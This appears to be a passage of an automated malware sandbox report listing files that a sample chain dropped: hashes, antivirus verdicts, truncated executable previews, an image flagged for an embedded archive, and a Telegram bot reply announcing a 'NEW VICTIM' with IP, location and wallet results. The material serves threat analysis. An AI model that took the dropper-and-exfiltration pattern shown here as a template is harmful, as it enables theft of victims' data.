SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc5q35VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5:	4ED743F7E1676539C322DAB36E328377
SHA1:	AAD5F8C6DF7C8CEC18522B9E572721A71F5182F3
SHA-256:	EBEEE88F4A11C2DB02A1AC83F7CF00BEADB70CF23670DA29487B6543A1EDCB00
SHA-512:	024E50C28044329DCEB38B02C7874F7FDB43FB84156E5C32ED8966F0682FFBA48A159D2DE96ADE52C33B5D3364612A9D1E16714B00944C18CD82D60F4479CADF
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1018
Entropy (8bit):	5.235990633565231
Encrypted:	false
SSDEEP:	24:YqHZ6T06Mhmpvmyb0O0bihmAvmy6CUXyhmDvmybxdB6hmKvmyz0JahmlvmybNdBd:YqHZ6T06McEyb0O0biczyDUXycaybxdp
MD5:	0D158326133D9F27F44A933593B668BB
SHA1:	634FB34DC528526CA14417C73DBC57C6A1155D28
SHA-256:	F0C4D41D7073B5255B4F85056C20C29F4435D540A0C9D6D9EED8B38F6508D9FC
SHA-512:	D108588E8D57AC94B4763A8C07C25E62F11CB089084791E5DF7C0621E3229E0637B9BBCE1AC26583889230B2517125CAC680CFD688BEFF5159C88771A9F89024
Malicious:	false
Reputation:	unknown
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":1015884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":1005884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":995884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":985884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":975884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":965884592,"LastSwitchedHighPart":31061873,"Pre

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	111792
Entropy (8bit):	4.024807308753198
Encrypted:	false
SSDEEP:	768:m2Vq97kIG3aXkvt/jk0Y+hgqkmONRLADmjCP8MPKQfR1vcMaEhymIyps33nbh0ip:skcXkrhrkmJOh0ibG1nNEFS9KL40
MD5:	CFFB6A6AF2569C5A0972846785D11A1C
SHA1:	A597410A686A77574962E46F47A438D9AF898D5A
SHA-256:	A0435AA22D8ECCE362807D9FBEDE774D60805E4CA94D56028409247629EE9E26
SHA-512:	4BD42894790D69018172577DCC6867329F2FA731B1DB3060BFF739B4240B809ABDEB809BBEE1177F2C82D8211ED50DAAF15C12F435CE0F6EC17D4CFA1B6816C3
Malicious:	false
Reputation:	unknown
Preview:	....h... ...............P...............^.......c................... ...\.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................... ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k..

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000014.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	110968
Entropy (8bit):	4.027048723741959
Encrypted:	false
SSDEEP:	768:9OVHSkkG8kCurrjk0c4JohF4NCL0+J7j037uPwJpR1v9jLu/3mh2ypj3wAhKiUGX:9Pk+pGJohFr+NhKiUGynnWFtKAj
MD5:	B22125BCC13A61DBA047BCDFB9E0BAB3
SHA1:	94731C627E2C935B0E46D30A69CB44B3569ECD0C
SHA-256:	392F6244B17270999FAD9598398C68D84EEAF03E6C9A81511DBB6C8EE968D029
SHA-512:	796604DD11536A06AA609787F70EDDC537A11B0DB2CB6513E67006DFE3C66CD32CDD29B981B00C767D33FB90DF6762C7595D4F44C702ABC64BEE7B85FE338727
Malicious:	false
Reputation:	unknown
Preview:	....h... ...x..........P..............^...X...c...........X..........\.......e.n.-.C.H.;.e.n.-.G.B.............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................... ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k..

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000015.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	109928
Entropy (8bit):	4.046016344827016
Encrypted:	false
SSDEEP:	768:WeaV0eAdkHGGCX39jk0Q7GigowNZL4soljQPZXPvrI4R1vcLBYLmemIyph3zyFlx:We3kxCiGigoQvvzhAigGQnTuF6KfG2jR
MD5:	F38A190B0898361ABE5DEFDBEBC78B7B
SHA1:	9D2D69C35694B2FB646467CB9B14730C67856BDD
SHA-256:	FC49164F5ED2C55A339D03CE38FED2CB5711DF89AC053C99DE070168C563013F
SHA-512:	F187183139C755BEBB980A17D4B4318D9295F53AC92D1B16D816F3A62F08B723E52C05E0C959875DDE3442557311784DBFA13655C841006D53D29E1444C1C217
Malicious:	false
Reputation:	unknown
Preview:	....h... ...h..........P.............._...P...d...........P..........\.......e.n.-.C.H.;.e.n.-.G.B.............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................... ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\dll[1]

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	242176
Entropy (8bit):	6.47050397947197
Encrypted:	false
SSDEEP:	6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
MD5:	2ECB51AB00C5F340380ECF849291DBCF
SHA1:	1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
SHA-256:	F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
SHA-512:	E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....:..s.....(...........2r...p(;...&Vr...p.....r...p.......(....>.........}.......(C.....o...(D...(E...}.....(F...(E...(G...&>.........}.......(C.....o...(D...}.....(F...(E...(H...&".......>.........}....R..} .....{ ...oo.....{ ..."..}!.....{!......}.....{#....{....op....{....,...{ ...oo.....{!...oo.....{....B.....su...(v.....{#....{#...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\download[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	unknown
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	321
Entropy (8bit):	4.99323851364312
Encrypted:	false
SSDEEP:	6:kX32J19HgIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kWJ1JgIOuHhA/XvoPPWV5k
MD5:	7225D8C283F7B303692A163301880199
SHA1:	7BF7F829E108693DB3DAD66B557EAA1DBA464D94
SHA-256:	19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
SHA-512:	05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
Malicious:	false
Reputation:	unknown
Preview:	{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\key[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	21
Entropy (8bit):	3.880179922675737
Encrypted:	false
SSDEEP:	3:gFsR0GOWW:gyRhI
MD5:	408E94319D97609B8E768415873D5A14
SHA1:	E1F56DE347505607893A0A1442B6F3659BEF79C4
SHA-256:	E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
SHA-512:	994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
Malicious:	false
Reputation:	unknown
Preview:	9tKiK3bsYm4fMuK47Pk3s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\sendMessage[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	776
Entropy (8bit):	5.108546360098665
Encrypted:	false
SSDEEP:	24:YKOHIy1JVBa4YGQVPe071kWPPyoZEB6eiasJENBm9c:YVHIQTBj/Q51bPtZLujMc
MD5:	00AF2D9E097D199AA57015C827AA4BDC
SHA1:	23F88DDDEB5A3A71C11AB306852B48492601D09B
SHA-256:	4937C3C4A29E398545DF31BEDD7AD2EEB7C76C0D166336CFEB02A647C7E430F8
SHA-512:	7D6EE381041CBB29B275F9110D5309335F31E2D8B6AB0FE59AEE0CE73023E6083CD66B1EF6A25BEE5A26C318498DE43AD3050596784045ABBD9D23D442F06309
Malicious:	false
Reputation:	unknown
Preview:	{"ok":true,"result":{"message_id":3302,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734018511,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 921702\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\u1w30Wt[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	308224
Entropy (8bit):	6.2756558263805555
Encrypted:	false
SSDEEP:	6144:b2JEWGoxDtDYL5s/oAg5+Z4vDWcEGpQTMz9J0tYRVmOEe3M5X64:NWGoxDt0LCgArZ4vHEGpQTMz72K4
MD5:	FF1E7643A5C9294BD8E8FD743B323C8F
SHA1:	B35C6E9090B44C2DB2220C5C42C0F68210BA73A9
SHA-256:	25F4451B243D5E5B05EACCF5DD58E3CFCEE7969B145D9AAD7AFF6750AB9A6D0B
SHA-512:	62B1F41DCAB0F4330D761CDBFC4E99E15830B4CDCC44E7788FD15F57F5043EB53E626E009C397DCCE13841E192165C4584CEE0F57C0E5BD5B876F507D051B675
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a\.i%=.:%=.:%=.:,EJ:&=.:%=.:&=.:JKr:-=.:JKC:$=.:JKD:$=.:Rich%=.:................PE..d...`PYg.........."......:...*......\4.........@..........................................@.................................................@h..(.......(.......@....................................................................P.. ............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data........p......................@....pdata..@............X..............@..@.rsrc...(............\..............@..@.x64.....`.......T...`..................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\AzVRM7c[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	605696
Entropy (8bit):	6.377818589865092
Encrypted:	false
SSDEEP:	12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
MD5:	3567CB15156760B2F111512FFDBC1451
SHA1:	2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
SHA-256:	0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
SHA-512:	E7A31B016417218387A4702E525D33DD4FE496557539B2AB173CEC0CB92052C750CFC4B3E7F02F3C66AC23F19A0C8A4EB6C9D2B590A5E9FAEB525E517BC877BA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B.......v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw......Rich....................PE..d...1.1g.........."....).....l.......2.........@..........................................`..........................................................`..H.......tL...........p..........p.......................(...@...@............................................text...>........................... ..`.rdata..d...........................@..@.data....;..........................@....pdata..tL.......N..................@..@.rsrc...H....`.......,..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\add[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	unknown
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\download[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	unknown
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	321
Entropy (8bit):	4.99323851364312
Encrypted:	false
SSDEEP:	6:kX32J19HgIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kWJ1JgIOuHhA/XvoPPWV5k
MD5:	7225D8C283F7B303692A163301880199
SHA1:	7BF7F829E108693DB3DAD66B557EAA1DBA464D94
SHA-256:	19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
SHA-512:	05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
Malicious:	false
Reputation:	unknown
Preview:	{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\output[1].png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe
File Type:	PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	156917
Entropy (8bit):	7.994509354006501
Encrypted:	true
SSDEEP:	3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
MD5:	F89267B24ECF471C16ADD613CEC34473
SHA1:	C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
SHA-256:	21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
SHA-512:	C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
Malicious:	false
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\output[1].png, Author: ditekSHen
Reputation:	unknown
Preview:	.PNG........IHDR................p....IDATx....\|.e....3......D dw6...S..Y.[......#L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.\|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2791936
Entropy (8bit):	6.551070324318134
Encrypted:	false
SSDEEP:	49152:IgFovv+WOSQ6SVSDXFpcaqYbcmO4el4cMe:7yGW7Q6SYTFDqYbcmO4el/Me
MD5:	38702763DFEDB9AD700580558B2E2CDE
SHA1:	A9D4F0323B1CF8DA172FE3EBEAB4984BB644C0D6
SHA-256:	79581F3E833D3CF26FDCD59A4C87261208909DBE061127F34D57ECB34C3EAA13
SHA-512:	4B00ACB48CF0DB1FA63572E84F94CF34E25E52B766E33460ED08ECD769B23C7C3F151FFCA0BECAC759FBDE83245E5256EEA98BD9E056D4CCA8D40BB2B644E180
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Reputation:	unknown
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. .......................@+.....r9+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...nwmnxdbs.@......:..:..............@...esrtnfgg. ..........t.............@....taggant.@....+.."...x*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	393728
Entropy (8bit):	6.004737079894222
Encrypted:	false
SSDEEP:	6144:sb3tLc1aQEo7F8Ci7oUPI13oxfys0geKPVMd5:uto1moSCi8RGBr7zVi
MD5:	DFD5F78A711FA92337010ECC028470B4
SHA1:	1A389091178F2BE8CE486CD860DE16263F8E902E
SHA-256:	DA96F2EB74E60DE791961EF3800C36A5E12202FE97AE5D2FCFC1FE404BC13C0D
SHA-512:	A3673074919039A2DC854B0F91D1E1A69724056594E33559741F53594E0F6E61E3D99EC664D541B17F09FFDEBC2DE1B042EEC19CA8477FAC86359C703F8C9656
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'..F...F...F.......F.......F.......F.....F...F...F.......F.......F.......F..Rich.F..........PE..L....f.e.................b...........Q............@...........................$.............................................8g..d....0...:...........................................................-..@............................................text....a.......b.................. ..`.data............`...f..............@....rsrc....z...0...<..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\soft[1]

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1502720
Entropy (8bit):	7.646111739368707
Encrypted:	false
SSDEEP:	24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
MD5:	A8CF5621811F7FAC55CFE8CB3FA6B9F6
SHA1:	121356839E8138A03141F5F5856936A85BD2A474
SHA-256:	614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
SHA-512:	4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(......(.....~....-.r...p.....(....o....s.........~.....~...........j(....r=..p~....o....t....j(....rM..p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t.....~......(....Vs....(....t.........N.(.....(.....(........0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\download[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	unknown
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
